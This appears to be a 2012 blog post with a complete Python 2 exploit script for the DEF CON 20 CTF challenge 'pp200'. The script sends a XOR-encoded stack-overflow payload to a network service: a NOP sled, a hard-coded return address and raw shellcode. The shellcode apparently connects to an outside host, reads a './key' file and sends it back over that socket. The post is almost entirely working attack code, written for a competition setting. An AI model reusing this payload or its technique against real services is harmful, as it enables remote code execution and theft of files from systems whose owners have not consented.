defcon20 pp200 exploit
2012. 6. 16. 14:08
#!/usr/bin/python2.6
# defcon 2012, pp200 exploit - badcob
#
# Listing restored to one statement per line; the page had collapsed the
# whole script onto a single line. Python 2 script: payloads are built as
# byte strings (str) and every literal is reproduced unchanged.
import socket
import sys
from struct import pack


def make_connection(host, port):
    """Open a TCP connection to (host, port) and return the connected socket."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    return sock


# shellcode
# Opaque machine code, kept byte-for-byte. It contains several \xCD\x80
# (x86 `int 0x80`) sequences and the ASCII fragments ".///" and "/key".
# NOTE(review): its behavior was not verified here.
scode = (
    "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
    "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
    "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"
)

# Target of the author's run: a private (RFC 1918) address.
host = "192.168.74.134"
port = 8912

# The two newline-terminated lines sent before the payload.
num = "b74b9d86e6cd3480" + "\x0a"
# "a6" matches the XOR key 0xa6 used below; presumably the service decodes
# later input with the byte given here -- confirm against the binary.
user_id = "a6" + "\x0a"

# Hard-coded 4-byte value (0xbfbee2bc when read little-endian); presumably a
# stack address that replaces a saved return address. A fixed address only
# holds for one exact memory layout, so ASLR or a different stack depth on
# the target would invalidate it.
ret = "\xbc\xe2\xbe\xbf"

# make payload
# Layout: 416 x 0x90 (x86 NOP), the shellcode, 17 x 0x90, one 0x0f byte,
# the 4-byte ret value, then the terminating newline.
temp = "\x90" * 416 + scode + "\x90" * 17 + "\x0f" + ret + "\x0a"

# XOR every byte with 0xa6. An encoded byte equal to 0x0a (newline) is
# treated as a failure -- presumably because the service reads one line.
# NOTE(review): on failure the loop only stops; the truncated payload built
# so far is still sent by the code below.
payload = ''
for x in temp:
    a = ord(x) ^ 0xa6
    if a == 0xa:
        print("failed")
        break
    payload += chr(a)

# Exchange: send num, print the reply, send user_id, print the reply, then
# send the encoded payload. The socket is never closed explicitly.
s = make_connection(host, port)
s.send(num)
print(s.recv(128))
s.send(user_id)
print(s.recv(128))
s.send(payload)